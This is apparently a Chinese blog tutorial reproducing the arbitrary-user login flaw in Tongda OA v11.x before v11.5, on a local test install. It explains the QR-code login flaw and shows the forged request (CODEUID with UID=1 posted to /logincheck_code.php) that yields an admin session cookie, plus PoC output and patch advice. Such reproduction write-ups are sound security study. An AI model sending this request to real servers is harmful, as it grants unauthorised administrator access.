通达OA 漏洞复现之第一篇v11.x-v11.5任意用户登录

旧城等待， 2023-01-15 13:22 2843阅读 0赞

### 文章目录 ###

*   *   *  漏洞简介
         *  漏洞原理
         *  影响范围
         *  环境搭建
         *   *   *  第一步 一路下一步安装
                 *  第二步 设置端口
                 *  第三步 本地访问
         *  漏洞复现
         *   *  方式一：抓包获取cookie信息
             *   *  第一步 访问/general/login\_code.php
                 *  第二步 提交数据到 /logincheck\_code.php，获得Set-Cookie信息。
                 *  第三步 验证登录/general/index.php
             *  方式二 poc执行
             *   *  第一步 使用poc获取管理员的Cookie信息
                 *  第二步 使用Cookie访问系统
         *  修复建议
         *  摘抄

### 漏洞简介 ###

*  通达OA是一套办公系统。
 *  2020年04月17日, 通达OA官方在更新了一个v11.5版本安全补丁, 其中修复了一个任意用户伪造登录漏洞
 *  该漏洞类型为任意用户伪造，未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录。
 *  未经授权的攻击者可以通过构造进行任意用户登录（包括admin），登录之后可进一步上传恶意文件控制网站服务器
 *  未经授权的攻击者通过构造请求包实现用户登录，又由于UID是主键且步进为1递增，从而导致可以指定UID实现任意用户登录（admin的缺省UID为1）

### 漏洞原理 ###

*  该漏洞在扫码登录处，用浏览器访问 `/general/login_code.php` 出现一个二维码，当手机客户端识别二维码，手机端同意登录后，手机端将二维码隐含的`codeuid`发送到`/general/login_code_scan.php`服务端进行保存登录配置。
 *  这期间浏览器JS不断请求`login_code_check.php`可以得知该codeuid是否登录成功需要跳转。
 *  得知已扫码后跳转到`logincheck_code.php`进行Set-Cookie完成登录

### 影响范围 ###

*  通达OA 2017版
 *  通达OA版本 V11.X < V11.5

### 环境搭建 ###

##### 第一步 一路下一步安装 #####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]

##### 第二步 设置端口 #####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]

##### 第三步 本地访问 #####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]

### 漏洞复现 ###

#### 方式一：抓包获取cookie信息 ####

##### 第一步 访问/general/login\_code.php #####

4ACA5F0E-FF2D-D479-4099-CB790521064E

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]

##### 第二步 提交数据到 /logincheck\_code.php，获得Set-Cookie信息。 #####

CODEUID={4ACA5F0E-FF2D-D479-4099-CB790521064E}&UID=1
    ------------------------------------------------------------
    Set-Cookie: PHPSESSID=6ofq3umebfb81upv5v9m7kjsf2; path=/
    {"status":1,"msg":"","url":"general\/index.php?isIE=0"}
    --------------------------------------------------------------

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 6]

##### 第三步 验证登录/general/index.php #####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 7]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 8]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 9]

#### 方式二 poc执行 ####

##### 第一步 使用poc获取管理员的Cookie信息 #####

[+]Get Available COOKIE:PHPSESSID=q5hnts9ne263qd0ophd7br1h93; path=/

![在这里插入图片描述][20210422180051789.png]

##### 第二步 使用Cookie访问系统 #####

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 10]  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 11]

### 修复建议 ###

*  点击系统更新，更新到V11.5.200417约需要10分钟。

### 摘抄 ###

--------------------

成长从来都是自己的事，

别让负面情绪成为别人的压力。

--------------------

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70]: /images/20221022/6721a65828874d15b6234e8ffbf277e8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 1]: https://img-blog.csdnimg.cn/20210422175909933.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy,size_16,color_FFFFFF,t_70
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 2]: /images/20221022/df25e1f8ce254f73aeca7eb4ca9c23e7.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 3]: /images/20221022/0f50e9d6d5e24ac9b6695e873519b49e.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 4]: /images/20221022/804422cbc3f741c284edef54f32aaeba.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 5]: /images/20221022/bd3a6b8ecf5246aab94094530dcb9e96.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 6]: /images/20221022/99ac146bf3c94380a85fc767907e4f57.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 7]: /images/20221022/7e7791911cde48b8bfb951f873fffdb2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 8]: /images/20221022/93d9208eaf0d4b4d8b9a2de14fc0bdc2.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 9]: /images/20221022/e8fe04e8aa574fdeade533eaad651db8.png
[20210422180051789.png]: /images/20221022/5730f90fb7c046f690222ddb1220839b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 10]: /images/20221022/10e7a1cf78714730abe01786ac577a69.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxOTAxMTIy_size_16_color_FFFFFF_t_70 11]: /images/20221022/18948f0ba25345708fa5f3880686b1c4.png